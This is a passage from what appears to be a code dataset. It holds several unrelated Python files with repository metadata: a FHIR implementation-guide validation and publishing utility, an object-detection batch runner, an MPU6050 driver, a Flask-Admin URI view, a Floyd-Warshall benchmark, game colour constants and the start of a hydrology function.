| 408
| 0.565635
|
2d8e60603370fa93f0c6e0fc27aa27f8a4a075af
| 16,892
|
py
|
Python
|
ncpi_fhir_utility/app.py
|
jecos/ncpi-fhir-utility
|
7d2380b737d931f61b53431f5083f093b6aaaad4
|
[
"Apache-2.0"
] | null | null | null |
ncpi_fhir_utility/app.py
|
jecos/ncpi-fhir-utility
|
7d2380b737d931f61b53431f5083f093b6aaaad4
|
[
"Apache-2.0"
] | null | null | null |
ncpi_fhir_utility/app.py
|
jecos/ncpi-fhir-utility
|
7d2380b737d931f61b53431f5083f093b6aaaad4
|
[
"Apache-2.0"
] | null | null | null |
"""
General module for methods called by the ncpi_fhir_utility.cli
- Validation of FHIR data model using IG publisher
- Remove resource configuration from IG
- Publish FHIR data model (conformance and example resources)
to Simplifier.net
"""
from collections import defaultdict
from copy import deepcopy
from pprint import pformat
import os
import logging
import subprocess
from shutil import rmtree
from configparser import ConfigParser
from requests.auth import HTTPBasicAuth
from ncpi_fhir_utility.oauth import OAuth
from ncpi_fhir_utility.utils import read_json, write_json, camel_to_snake
from ncpi_fhir_utility import loader
from ncpi_fhir_utility.client import FhirApiClient
from ncpi_fhir_utility.config import (
RUN_IG_PUBLISHER_SCRIPT,
CONFORMANCE_RESOURCES,
RESOURCE_SUBMISSION_ORDER,
)
RESOURCE_ID_DELIM = "-"
FILENAME_DELIM = RESOURCE_ID_DELIM
logger = logging.getLogger(__name__)
def validate(
ig_control_filepath,
clear_output=False,
publisher_opts="",
refresh_publisher=True,
):
"""
Validate the FHIR data model (FHIR conformance and example resources)
Run the HL7 FHIR implementation guide (IG) publisher in a Docker container
to validate conformance resources and any example resources against the
conformance resources.
See https://confluence.hl7.org/display/FHIR/IG+Publisher+Documentation
Validation fails if any of the following are true:
- The publisher returns a non-zero exit code
- QA report contains errors with the FHIR resources.
- Any one of the resource files fail model validation in
_custom_validate
IG build errors are ignored since this method only validates the data
model
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:param clear_output: Whether to clear all generated output before
validating
:type clear_output: boolean
:param publisher_opts: IG publisher command line options forwarded directly
to the publisher CLI
:type publisher_opts: str
:param refresh_publisher: A flag specifying whether to pull down the IG
publisher Docker image from the remote Docker repository before running
the IG publisher
:type refresh_publisher: boolean
"""
logger.info("Begin validation of FHIR data model")
ig_control_filepath = os.path.abspath(
os.path.expanduser(ig_control_filepath)
)
# Clear previously generated output
if clear_output:
clear_ig_output(ig_control_filepath)
# Read in ig resource file
ig_resource_dict = _load_ig_resource_dict(ig_control_filepath)
# Collect resource filepaths
resource_dicts = []
site_root = os.path.dirname(ig_control_filepath)
ig = ig_resource_dict["content"]
for param in ig.get("definition", {}).get("parameter", []):
if param.get("code") != "path-resource":
continue
resource_dicts.extend(
loader.load_resources(os.path.join(site_root, param.get("value")))
)
# Validate and add resource to IG configuration
_custom_validate(resource_dicts)
# Add entry to IG configuration
_update_ig_config(resource_dicts, ig_resource_dict, add=True)
# Do the standard HL7 FHIR validation via the IG Publisher
_fhir_validate(ig_control_filepath, publisher_opts, refresh_publisher)
logger.info("End validation of FHIR data model")
def clear_ig_output(ig_control_filepath):
"""
Delete all of the output dirs generated by the IG publisher
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
"""
site_root = os.path.dirname(ig_control_filepath)
for dir in ["output", "temp", "template", "input-cache"]:
p = os.path.join(site_root, dir)
if os.path.exists(p):
logger.info(f"Clearing all previously generated output at: {p}")
rmtree(p)
def update_ig_config(data_path, ig_control_filepath, add=True, rm_file=False):
"""
Add/remove the configuration entries to/from IG resource file for all
resources in data_path.
Optional - delete the resource file(s). Only applies if add=False.
When a new resource file is added to the IG it will not be picked up for
validation or site generation by the IG publisher unless the expected
configuration for that resource is present.
:param data_path: Path to directory or file containing resource(s) to
remove from the IG configuration
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:param add: Whether to add the configuration versus remove it
:type add: bool
:param rm_file: Whether to delete the resource file(s). Only applies if
add=False
:type rm_file: bool
"""
# Load resource dicts
resource_dicts = loader.load_resources(data_path)
# Load IG resource dict
ig_resource_dict = deepcopy(_load_ig_resource_dict(ig_control_filepath))
# Validate and add resource to IG configuration
_custom_validate(resource_dicts)
# Update the IG configuration
_update_ig_config(resource_dicts, ig_resource_dict)
def publish_to_server(
resource_file_or_dir,
base_url,
username=None,
password=None,
oauth_url=None,
oauth_client_id=None,
oauth_client_secret=None,
oauth_uma_audience=None,
fhir_version=None,
submission_order=RESOURCE_SUBMISSION_ORDER,
):
"""
Push FHIR resources to a FHIR server
Delete the resources if they exist on the server
PUT any resources that have an `id` attribute defined
POST any resources that do not have an `id` attribute defined
:param resource_file_or_dir: path to a directory containing FHIR resource
files or path to a single resource file
:type resource_file_or_dir: str
:param username: Server account username
:type username: str
:param password: Server account password
:type password: str
:param oauth_url: OAuth provider url used to get an access token
:type oauth_url: str
:param oauth_client_id: OAuth client id
:type oauth_client_id: str
:param oauth_client_secret: OAuth client secret
:type oauth_client_secret: str
:param oauth_uma_audience: OAuth audience to use to get a UMA ticket. If not
present, a singular access token is used.
:type oauth_uma_audience: str
:param fhir_version: FHIR version number
:type fhir_version: str
"""
logger.info(
f"Begin publishing resources in {resource_file_or_dir} to {base_url}"
)
if username and password:
auth = HTTPBasicAuth(username, password)
elif oauth_url and oauth_client_id and oauth_client_secret:
auth = OAuth(oauth_url, oauth_client_id, oauth_client_secret, oauth_uma_audience)
else:
auth = None
client = FhirApiClient(
base_url=base_url, auth=auth, fhir_version=fhir_version
)
resources = loader.load_resources(resource_file_or_dir)
# Re-order resources according to submission order
resources_by_type = defaultdict(list)
for r_dict in resources:
resources_by_type[r_dict["resource_type"]].append(r_dict)
resources = []
for r_type in submission_order:
resources.extend(resources_by_type.pop(r_type, []))
for r_type, remaining in resources_by_type.items():
resources.extend(remaining)
# Delete existing resources
for r_dict in resources:
r = r_dict["content"]
if "url" in r:
success = client.delete_all(
f'{base_url}/{r["resourceType"]}', params={"url": r["url"]}
)
elif "id" in r:
success, results = client.send_request(
"delete", f'{base_url}/{r["resourceType"]}/{r["id"]}'
)
else:
logger.warning(
f'⚠️ Could not delete {r_dict["filename"]}. No way to '
"identify the resource. Tried looking for `url` and `id` in "
"payload."
)
# POST if no id is provided, PUT if id is provided
for r_dict in resources:
r = r_dict["content"]
id_ = r.get("id")
if id_:
success, results = client.send_request(
"put", f'{base_url}/{r["resourceType"]}/{id_}', json=r
)
else:
success, results = client.send_request(
"post", f'{base_url}/{r["resourceType"]}', json=r
)
if not success:
errors = [
r
for r in results["response"]["issue"]
if r["severity"] == "error"
]
raise Exception(f"Publish failed! Caused by:\n{pformat(errors)}")
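# A minimal usage sketch (server URL, path and credentials are hypothetical):
#
#   publish_to_server(
#       "site_root/input/resources",
#       "http://localhost:8000",
#       username="admin",
#       password="password",
#       fhir_version="4.0.1",
#   )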
def _fhir_validate(ig_control_filepath, publisher_opts, refresh_publisher):
"""
Run the HL7 IG Publisher to do standard FHIR validation on resource files
Called in validate
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:param publisher_opts: IG publisher command line options forwarded directly
to the publisher CLI
:type publisher_opts: str
:param refresh_publisher: A flag specifying whether to pull down the IG
publisher Docker image from the remote Docker repository before running
the IG publisher
:type refresh_publisher: boolean
"""
# Run IG publisher to do FHIR validation
args = [
RUN_IG_PUBLISHER_SCRIPT,
ig_control_filepath,
str(int(refresh_publisher)),
]
if publisher_opts:
args.append(publisher_opts)
subprocess.run(args, shell=False, check=True)
# Check QA report for validation errors
site_root = os.path.dirname(ig_control_filepath)
qa_path = os.path.join(site_root, "output", "qa")
qa_report = os.path.abspath(qa_path + ".html")
logger.info(f"Checking QA report {qa_report} for validation errors")
qa_json = read_json(qa_path + ".json")
if qa_json.get("errs"):
# Extract error messages from qa.txt
errors = []
with open(os.path.abspath(qa_path + ".txt")) as qa_txt:
for line in qa_txt.readlines():
ln = line.strip()
if ln.lower().startswith("error") and (".html" not in ln):
errors.append(ln)
errors = "\n".join(errors)
raise Exception(
f"Errors found in QA report. See {qa_report} for details:"
f"\n\n{errors}\n"
)
def _custom_validate(resource_dicts):
"""
Do custom validation of a resource file in the FHIR model
Called in validate
Validation Rules:
1. JSON paylod must have an `id` attribute populated with a value which
adheres to kebab-case
2. StructureDefinition must have `url` defined
3. StructureDefinition.id = StructureDefinition.url.split('/')[-1]
4. File name must follow format <resource type>-<resource id>
"""
for rd in resource_dicts:
res = rd["content"]
# Check if id is present
rid = res.get("id")
if not rid:
raise KeyError(
"All resources must have an `id` attribute. Resource file: "
f'{rd["filepath"]} is missing `id` or `id` is null.'
)
# If StructureDefinition check that URL is valid
if res["resourceType"] == "StructureDefinition":
if not res.get("url"):
raise KeyError(
"All StructureDefinition resources must have a `url`. "
f'Resource file: {rd["filepath"]} is missing `url` or '
"`url` is null."
)
url_parts = res.get("url").split("/")
if res["id"] != url_parts[-1]:
raise ValueError(
"Invalid value for `url` in StructureDefinition: "
f'{rd["filepath"]}. Value should be: '
f'{"/".join(url_parts[:-1] + [res["id"]])}'
)
# Try to check if id follows kebab-case (won't be perfect)
expected_id = camel_to_snake(rid).replace("_", "-")
if rid != expected_id:
raise ValueError(
"Resource id must adhere to kebab-case (lowercase with "
f'hyphens between tokens). The `id` "{rid}" in '
f'{rd["filepath"]} should be: {expected_id}'
)
# Check filename
filename, ext = os.path.splitext(os.path.split(rd["filepath"])[-1])
rtype = rd.get("resource_type")
expected_filename = f"{rtype}-{rid}"
if filename != expected_filename:
raise ValueError(
"Resource file names must follow pattern: "
f"<resource type>-<resource id>.json. File {filename}{ext} "
f"should be: {expected_filename}{ext}"
)
logger.info(f"☑️ Initial validation passed for resource {filename + ext}")
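# Illustrative example of a resource that passes every rule above (names are
# hypothetical): a file named StructureDefinition-research-subject.json whose
# payload contains
#   "resourceType": "StructureDefinition",
#   "id": "research-subject",
#   "url": "http://example.org/fhir/StructureDefinition/research-subject"
# i.e. a kebab-case id, a url whose last segment equals the id, and a
# <resource type>-<resource id> file name.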
def _update_ig_config(
resource_dicts, ig_resource_dict, add=True, rm_file=False
):
"""
Helper for update_ig_config
"""
# Collect resource ids from the input set of resources
resource_set = {
f'{r["content"]["resourceType"]}/{r["content"]["id"]}'
for r in resource_dicts
}
# Reformat IG resource list into a dict so it's easier to update
ig_resource = ig_resource_dict["content"]
resources_dict = {}
for r in ig_resource["definition"]["resource"]:
# Only include resources from IG config that have corresponding files
# Old IG entries will be discarded
key = r["reference"]["reference"]
if key in resource_set:
resources_dict[key] = r
else:
logger.info(f"🔥 Removing old entry {key} from IG")
for rd in resource_dicts:
if rd["resource_type"] == "ImplementationGuide":
continue
# Create the config entry
entry = _create_resource_config(rd, ig_resource.get("publisher"))
# Add/remove configuration entries
if add:
resources_dict[entry["reference"]["reference"]] = entry
else:
del resources_dict[entry["reference"]["reference"]]
if rm_file:
os.remove(rd["filepath"])
logger.info(f'🗑 Deleted resource file {rd["filepath"]}')
logger.info(f'☑️ Added IG configuration for {rd["filename"]}')
# Format resource dict back to original list
ig_resource["definition"]["resource"] = [
resources_dict[k] for k in resources_dict
]
write_json(
ig_resource_dict["content"], ig_resource_dict["filepath"], indent=2
)
def _create_resource_config(resource_dict, publisher=""):
"""
Create the expected IG configuration entry for a resource
:param resource_dict: The resource payload from which a config entry will
be created. See ncpi_fhir_utility.loader.load_resources.
:type resource_dict: dict
:param publisher: The value of ImplementationGuide.publisher
:type publisher: str
:returns: IG config entry for the resource
"""
rid = resource_dict["content"].get("id")
rtype = resource_dict["content"].get("resourceType")
suffix = ""
if rtype in CONFORMANCE_RESOURCES:
is_example = False
base = resource_dict["content"].get("baseDefinition")
if base:
base = base.split("/")[-1]
suffix = f", Base: {base}"
else:
is_example = True
profiles = ",".join(
[
p.split("/")[-1]
for p in resource_dict["content"]
.get("meta", {})
.get("profile", [])
]
)
if profiles:
suffix = f", Profiles: {profiles}"
if publisher:
publisher = publisher + " "
return {
"reference": {"reference": f"{rtype}/{rid}"},
"name": f"{publisher}{rtype}/{rid}",
"description": f"{publisher}{rtype} {rid}{suffix}",
"exampleBoolean": is_example,
}
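# Illustrative example (assumes StructureDefinition is listed in
# CONFORMANCE_RESOURCES): for a resource with id "research-subject", a base
# definition whose last segment is "Patient", and publisher "NCPI", the entry
# returned above would be
#   {"reference": {"reference": "StructureDefinition/research-subject"},
#    "name": "NCPI StructureDefinition/research-subject",
#    "description": "NCPI StructureDefinition research-subject, Base: Patient",
#    "exampleBoolean": False}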
def _load_ig_resource_dict(ig_control_filepath):
"""
Load IG resource JSON into a dict
Find the location of the IG resource file from the ig control file first
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:returns: IG resource dict
"""
# Read in ig control file
ig_control_filepath = os.path.abspath(
os.path.expanduser(ig_control_filepath)
)
ig_config = ConfigParser()
ig_config.read(ig_control_filepath)
# Read in ig resource file
ig_filepath = os.path.join(
os.path.split(ig_control_filepath)[0], dict(ig_config["IG"]).get("ig")
)
return loader.load_resources(ig_filepath)[0]
| 35.265136
| 114
| 0.647881
|
558c562a8f1a3cab94307152cc2642d4aff63ddf
| 1,610
|
py
|
Python
|
program/execute.py
|
alfanyRizaMahendra/tf2-object-detection-api
|
79a56f591744ae795b37b8c9c3ade212c37dba5f
|
[
"MIT"
] | null | null | null |
program/execute.py
|
alfanyRizaMahendra/tf2-object-detection-api
|
79a56f591744ae795b37b8c9c3ade212c37dba5f
|
[
"MIT"
] | null | null | null |
program/execute.py
|
alfanyRizaMahendra/tf2-object-detection-api
|
79a56f591744ae795b37b8c9c3ade212c37dba5f
|
[
"MIT"
] | null | null | null |
import subprocess
models = [
# 'faster-rcnn-resnet50-6000',
# 'faster-rcnn-resnet50-5000',
# 'faster-rcnn-resnet50-4000',
# 'ssd-mobilenet-v2-4000',
# 'ssd-mobilenet-v2-6000',
'ssd-mobilenet-v2-5000',
]
threshold_setup = [0.3]
test_images_folders = ['1', '2']
for threshold in threshold_setup:
# Generate string for threshold output folder
threshold_str = str(threshold)
threshold_str = threshold_str.replace('.', '_')
for folder in test_images_folders:
# Generate string for output folder
folder_subname = folder.replace('/', '_')
for model in models:
print('start executing [folder: ' + folder + '] ' + ' [threshold: ' + str(threshold) + ']: ' + model )
# Generate output directory
output_directory = 'output_' + folder_subname + '_' + threshold_str
# Generate command to execute [on terminal]
command_to_execute = 'python3 detect_objects.py --threshold ' + str(threshold) +' --model_path models/' + model + ' --path_to_labelmap models/shrimp-seed_label_map.pbtxt --images_dir data/' + folder +' --output_directory data/' + output_directory + '/' + model + ' --save_output'
subprocess_result = subprocess.check_output(command_to_execute, shell=True)
print('subprocess result:')
print(subprocess_result)
print('decode subprocess result:')
print(subprocess_result.decode('utf-8'))
print(model + ' [folder: ' + folder + '] ' + ' [threshold: ' + str(threshold) + ']: DONE!')
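# --- Optional variant (sketch; not used above) ---
# The same detection command expressed as an argument list and run without
# shell=True, which avoids shell-quoting issues if any path ever contains
# spaces. All paths and flags are the same assumptions as in the loop above.
def run_detection(model, folder, threshold, output_directory):
    args = [
        'python3', 'detect_objects.py',
        '--threshold', str(threshold),
        '--model_path', 'models/' + model,
        '--path_to_labelmap', 'models/shrimp-seed_label_map.pbtxt',
        '--images_dir', 'data/' + folder,
        '--output_directory', 'data/' + output_directory + '/' + model,
        '--save_output',
    ]
    return subprocess.check_output(args)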
| 39.268293
| 292
| 0.61677
|
bd8410bfa585453f1b95ce7a697c3be34fa7c086
| 2,889
|
py
|
Python
|
ports/stm32/modules/ophyra_mpu60.py
|
Krasn4ck/micropython
|
3570ed274d8201d52dfebdb2cebc280d9f46d59c
|
[
"MIT"
] | null | null | null |
ports/stm32/modules/ophyra_mpu60.py
|
Krasn4ck/micropython
|
3570ed274d8201d52dfebdb2cebc280d9f46d59c
|
[
"MIT"
] | null | null | null |
ports/stm32/modules/ophyra_mpu60.py
|
Krasn4ck/micropython
|
3570ed274d8201d52dfebdb2cebc280d9f46d59c
|
[
"MIT"
] | 1
|
2021-03-25T16:47:07.000Z
|
2021-03-25T16:47:07.000Z
|
import pyb
import time
from pyb import I2C
class MPU6050_init(object):
def __init__(self):
self.saddres = 104
self.accel = 0
self.env_gyr = 0
self.env_accel = 0
self.gyr = 0
self.acel = 2
self.tem = 340
self.g = 0
self.y = 128
self.sen = 0
self.i2c = I2C(1, I2C.MASTER)
self.i2c.init(I2C.MASTER, baudrate=400000)
class MPU6050(MPU6050_init):
def init(self,accel, gyr):
if accel == 2:
self.env_accel = 0
self.g = 16384
elif accel == 4:
self.env_accel = 8
self.g = 8192
elif accel == 8:
self.env_accel = 16
self.g = 4096
else:
self.env_accel = 24
self.g = 2048
if gyr == 250:
self.env_gyr = 0
self.sen = 131
elif gyr == 500:
self.env_gyr = 8
self.sen = 65.5
elif gyr == 1000:
self.env_gyr = 16
self.sen = 32.8
else:
self.env_gyr = 24
self.sen = 16.4
        self.i2c.mem_write(0, self.saddres, 107)              # PWR_MGMT_1 (0x6B): wake the sensor
        self.i2c.mem_write(self.env_accel, self.saddres, 28)  # ACCEL_CONFIG (0x1C): accel full-scale range
        self.i2c.mem_write(self.env_gyr, self.saddres, 27)    # GYRO_CONFIG (0x1B): gyro full-scale range
def accX(self):
x=self.i2c.mem_read(2,self.saddres,59)
x=int.from_bytes(x,'big')
if x > 32767:
x = (65536 - x)*-1
return x/self.g
else:
return x/self.g
def accY(self):
x=self.i2c.mem_read(2,self.saddres,61)
x=int.from_bytes(x,'big')
if x > 32767:
x = (65536 - x)*-1
return x/self.g
else:
return x/self.g
def accZ(self):
x=self.i2c.mem_read(2,self.saddres,63)
x=int.from_bytes(x,'big')
if x > 32767:
x = (65536 - x)*-1
return x/self.g
else:
return x/self.g
def temp(self):
x = ord(self.i2c.mem_read(1,self.saddres,65))
x1 = ord(self.i2c.mem_read(1,self.saddres,66))
z2 = x << 8
x3 = z2 + x1
value = x3 / self.tem
value2 = value + 36.53
value3 = value2 / 10
return value3
def gyrX(self):
x=self.i2c.mem_read(2,self.saddres,67)
x=int.from_bytes(x,'big')
if x > 32767:
x = (65536 - x)*-1
return x/self.sen
else:
return x/self.sen
def gyrY(self):
x=self.i2c.mem_read(2,self.saddres,69)
x=int.from_bytes(x,'big')
if x > 32767:
x = (65536 - x)*-1
return x/self.sen
else:
return x/self.sen
def gyrZ(self):
x=self.i2c.mem_read(2, self.saddres, 71)
x=int.from_bytes(x,'big')
if x > 32767:
x = (65536 - x)*-1
return x/self.sen
else:
return x/self.sen
def write(self,num,addres):
self.i2c.mem_write(num,self.saddres,addres)
def read(self,addres):
x=ord(self.i2c.mem_read(1,self.saddres,addres))
return x
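# --- Illustrative usage (sketch; requires the MPU6050 on I2C bus 1) ---
# Not part of the original driver. Configures +/-2 g and +/-250 deg/s
# full-scale ranges, then reads one sample of each quantity.
def demo_read():
    sensor = MPU6050()
    sensor.init(2, 250)
    print(sensor.accX(), sensor.accY(), sensor.accZ())  # acceleration [g]
    print(sensor.gyrX(), sensor.gyrY(), sensor.gyrZ())  # angular rate [deg/s]
    print(sensor.temp())                                # temperature reading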
| 26.504587
| 60
| 0.527172
|
9b1f07f1dcfb26cf44440ec3dcb47abe34c92a22
| 1,559
|
py
|
Python
|
app/controllers/admin/uri_model_view.py
|
politeauthority/simple-honey
|
a875773c3299044b113c339203c909b6c4391fb4
|
[
"MIT"
] | null | null | null |
app/controllers/admin/uri_model_view.py
|
politeauthority/simple-honey
|
a875773c3299044b113c339203c909b6c4391fb4
|
[
"MIT"
] | 1
|
2021-06-01T21:43:04.000Z
|
2021-06-01T21:43:04.000Z
|
app/controllers/admin/uri_model_view.py
|
politeauthority/simple-honey
|
a875773c3299044b113c339203c909b6c4391fb4
|
[
"MIT"
] | null | null | null |
"""URI Model View
Admin view controller to display all registered and non registed uris in the Simple-Honey system.
"""
from flask_admin.form import SecureForm
from wtforms import validators
from app.controllers.admin.base_model_view import BaseModelView
from app.utilities import formatters
from app.utilities import admin_tools
class UriModelView(BaseModelView):
"""
View Class for URIs
"""
page_size = 25
column_type_formatters = admin_tools.default_column_formatters()
column_list = ['domain', 'uri', 'name', 'last_hit', 'hits', 'response_type']
column_formatters = dict(uri=formatters.uri_to_webrequest_links)
column_searchable_list = ['uri', 'name']
column_exclude_list = ['ts_updated']
column_default_sort = ('ts_updated', True)
form_base_class = SecureForm
form_excluded_columns = ['ts_created', 'ts_updated', 'last_hit', 'requests']
form_choices = {
'response_type': [
('', 'Blank Response'),
('file', 'Static file'),
('redirect', 'Redirect'),
('image_center', 'Image Centered'),
('raw_content', 'Raw Content'),
('custom_template', 'Custom Template'),
('markdown', 'Mark Down (.md)'),
('python_file', 'Custom Python File')
]
}
form_args = {
'uri': {
'label': 'Uri',
'validators': [validators.required()]
},
}
on_model_change = admin_tools.refresh_cache_file
# End File: simple-honey/app/controllers/admin/uri_model_view.py
| 31.816327
| 97
| 0.644003
|
38ba6fb8fb176bb844d5da48e2113a7681b3916a
| 6,816
|
py
|
Python
|
benchmarks/medley/floyd_warshall/floyd_warshall.py
|
MA2G1/polybench-python
|
a6fe1f505e1066fe703b15943836ea4eceeddd94
|
[
"Apache-2.0"
] | 2
|
2021-05-12T11:57:46.000Z
|
2022-01-12T12:14:17.000Z
|
benchmarks/medley/floyd_warshall/floyd_warshall.py
|
MA2G1/polybench-python
|
a6fe1f505e1066fe703b15943836ea4eceeddd94
|
[
"Apache-2.0"
] | null | null | null |
benchmarks/medley/floyd_warshall/floyd_warshall.py
|
MA2G1/polybench-python
|
a6fe1f505e1066fe703b15943836ea4eceeddd94
|
[
"Apache-2.0"
] | 2
|
2020-11-17T11:52:35.000Z
|
2021-12-15T07:41:10.000Z
|
# Copyright 2019 Miguel Angel Abella Gonzalez <miguel.abella@udc.es>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""<replace_with_module_description>"""
from benchmarks.polybench import PolyBench
from benchmarks.polybench_classes import ArrayImplementation
from benchmarks.polybench_classes import PolyBenchOptions, PolyBenchSpec
from numpy.core.multiarray import ndarray
class Floyd_warshall(PolyBench):
def __new__(cls, options: PolyBenchOptions, parameters: PolyBenchSpec):
implementation = options.POLYBENCH_ARRAY_IMPLEMENTATION
if implementation == ArrayImplementation.LIST:
return _StrategyList.__new__(_StrategyList, options, parameters)
elif implementation == ArrayImplementation.LIST_FLATTENED:
return _StrategyListFlattened.__new__(_StrategyListFlattened, options, parameters)
elif implementation == ArrayImplementation.NUMPY:
return _StrategyNumPy.__new__(_StrategyNumPy, options, parameters)
def __init__(self, options: PolyBenchOptions, parameters: PolyBenchSpec):
super().__init__(options, parameters)
# The parameters hold the necessary information obtained from "polybench.spec" file
params = parameters.DataSets.get(self.DATASET_SIZE)
if not isinstance(params, dict):
raise NotImplementedError(f'Dataset size "{self.DATASET_SIZE.name}" not implemented '
f'for {parameters.Category}/{parameters.Name}.')
# Set up problem size from the given parameters (adapt this part with appropriate parameters)
self.N = params.get('N')
def run_benchmark(self):
# Create data structures (arrays, auxiliary variables, etc.)
path = self.create_array(2, [self.N, self.N], self.DATA_TYPE(0))
# Initialize data structures
self.initialize_array(path)
# Benchmark the kernel
self.time_kernel(path)
# Return printable data as a list of tuples ('name', value).
# Each tuple element must have the following format:
# (A: str, B: matrix)
# - A: a representative name for the data (this string will be printed out)
# - B: the actual data structure holding the computed result
#
# The syntax for the return statement would then be:
# - For single data structure results:
# return [('data_name', data)]
# - For multiple data structure results:
# return [('matrix1', m1), ('matrix2', m2), ... ]
return [('path', path)]
class _StrategyList(Floyd_warshall):
def __new__(cls, options: PolyBenchOptions, parameters: PolyBenchSpec):
return object.__new__(_StrategyList)
def __init__(self, options: PolyBenchOptions, parameters: PolyBenchSpec):
super().__init__(options, parameters)
def initialize_array(self, path: list):
for i in range(0, self.N):
for j in range(0, self.N):
path[i][j] = i * j % 7 + 1
if (i + j) % 13 == 0 or (i + j) % 7 == 0 or (i + j) % 11 == 0:
path[i][j] = 999
def print_array_custom(self, path: list, name: str):
for i in range(0, self.N):
for j in range(0, self.N):
if (i * self.N + j) % 20 == 0:
self.print_message('\n')
self.print_value(path[i][j])
def kernel(self, path: list):
# scop begin
for k in range(0, self.N):
for i in range(0, self.N):
for j in range(0, self.N):
if path[i][j] < path[i][k] + path[k][j]:
path[i][j] = path[i][j]
else:
path[i][j] = path[i][k] + path[k][j]
# scop end
class _StrategyListFlattened(Floyd_warshall):
def __new__(cls, options: PolyBenchOptions, parameters: PolyBenchSpec):
return object.__new__(_StrategyListFlattened)
def __init__(self, options: PolyBenchOptions, parameters: PolyBenchSpec):
super().__init__(options, parameters)
def initialize_array(self, path: list):
for i in range(0, self.N):
for j in range(0, self.N):
path[self.N * i + j] = i * j % 7 + 1
if (i + j) % 13 == 0 or (i + j) % 7 == 0 or (i + j) % 11 == 0:
path[self.N * i + j] = 999
def print_array_custom(self, path: list, name: str):
for i in range(0, self.N):
for j in range(0, self.N):
if (i * self.N + j) % 20 == 0:
self.print_message('\n')
self.print_value(path[self.N * i + j])
def kernel(self, path: list):
# scop begin
for k in range(0, self.N):
for i in range(0, self.N):
for j in range(0, self.N):
if path[self.N * i + j] < path[self.N * i + k] + path[self.N * k + j]:
path[self.N * i + j] = path[self.N * i + j]
else:
path[self.N * i + j] = path[self.N * i + k] + path[self.N * k + j]
# scop end
class _StrategyNumPy(Floyd_warshall):
def __new__(cls, options: PolyBenchOptions, parameters: PolyBenchSpec):
return object.__new__(_StrategyNumPy)
def __init__(self, options: PolyBenchOptions, parameters: PolyBenchSpec):
super().__init__(options, parameters)
def initialize_array(self, path: ndarray):
for i in range(0, self.N):
for j in range(0, self.N):
path[i, j] = i * j % 7 + 1
if (i + j) % 13 == 0 or (i + j) % 7 == 0 or (i + j) % 11 == 0:
path[i, j] = 999
def print_array_custom(self, path: ndarray, name: str):
for i in range(0, self.N):
for j in range(0, self.N):
if (i * self.N + j) % 20 == 0:
self.print_message('\n')
self.print_value(path[i, j])
def kernel(self, path: ndarray):
# scop begin
for k in range(0, self.N):
for i in range(0, self.N):
for j in range(0, self.N):
if path[i, j] < path[i, k] + path[k, j]:
path[i, j] = path[i, j]
else:
path[i, j] = path[i, k] + path[k, j]
# scop end
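# --- Reference sketch (not part of the PolyBench kernels above) ---
# The same min-plus update written with NumPy broadcasting: for each
# intermediate node k, path[i, j] = min(path[i, j], path[i, k] + path[k, j])
# for all (i, j) at once. Useful as an independent check of the kernels.
def floyd_warshall_reference(path):
    import numpy
    n = path.shape[0]
    for k in range(n):
        path = numpy.minimum(path, path[:, k:k + 1] + path[k:k + 1, :])
    return path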
| 40.094118
| 101
| 0.58304
|
74b7ccfd806fcd2f73f069a89330a6b5b3ca18e2
| 1,421
|
py
|
Python
|
Constants/colors.py
|
bahaozsahin/pygame-2048
|
ee2ff9f2766970c9f0ed64c249b3aa55252f561b
|
[
"MIT"
] | 1
|
2021-12-01T13:55:54.000Z
|
2021-12-01T13:55:54.000Z
|
Constants/colors.py
|
bahaozsahin/tkinter-2048
|
ee2ff9f2766970c9f0ed64c249b3aa55252f561b
|
[
"MIT"
] | 1
|
2021-04-11T11:47:56.000Z
|
2021-04-11T11:47:56.000Z
|
Constants/colors.py
|
bahaozsahin/tkinter-2048
|
ee2ff9f2766970c9f0ed64c249b3aa55252f561b
|
[
"MIT"
] | null | null | null |
#Used the same color scheme as the mobile game
class c:
GRID_COLOR = "#a39489"
EMPTY_CELL_COLOR = "#c2b3a9"
SCORE_LABEL_FONT = ("Verdana", 20)
SCORE_FONT = ("Helvetica", 32, "bold")
GAME_OVER_FONT = ("Helvetica", 48, "bold")
GAME_OVER_FONT_COLOR = "#ffffff"
WINNER_BG = "#ffcc00"
LOSER_BG = "#a39489"
CELL_COLORS = {
2: "#fcefe6",
4: "#f2e8cb",
8: "#f5b682",
16: "#f29446",
32: "#ff775c",
64: "#e64c2e",
128: "#ede291",
256: "#fce130",
512: "#ffdb4a",
1024: "#f0b922",
2048: "#fad74d"
}
CELL_NUMBER_COLORS = {
2: "#695c57",
4: "#695c57",
8: "#ffffff",
16: "#ffffff",
32: "#ffffff",
64: "#ffffff",
128: "#ffffff",
256: "#ffffff",
512: "#ffffff",
1024: "#ffffff",
2048: "#ffffff"
}
CELL_NUMBER_FONTS = {
2: ("Helvetica", 55, "bold"),
4: ("Helvetica", 55, "bold"),
8: ("Helvetica", 55, "bold"),
16: ("Helvetica", 50, "bold"),
32: ("Helvetica", 50, "bold"),
64: ("Helvetica", 50, "bold"),
128: ("Helvetica", 45, "bold"),
256: ("Helvetica", 45, "bold"),
512: ("Helvetica", 45, "bold"),
1024: ("Helvetica", 40, "bold"),
2048: ("Helvetica", 40, "bold")
}
| 27.326923
| 47
| 0.447572
|
f3f0d8992dad1fc6e02c6b841dff6ff5e43a677b
| 1,261
|
py
|
Python
|
wflow/wflow/sphy/subzone.py
|
quanpands/wflow
|
b454a55e4a63556eaac3fbabd97f8a0b80901e5a
|
[
"MIT"
] | null | null | null |
wflow/wflow/sphy/subzone.py
|
quanpands/wflow
|
b454a55e4a63556eaac3fbabd97f8a0b80901e5a
|
[
"MIT"
] | null | null | null |
wflow/wflow/sphy/subzone.py
|
quanpands/wflow
|
b454a55e4a63556eaac3fbabd97f8a0b80901e5a
|
[
"MIT"
] | null | null | null |
# -Function to calculate capillary rise
def CapilRise(pcr, subfield, subwater, capmax, rootwater, rootsat, rootfield):
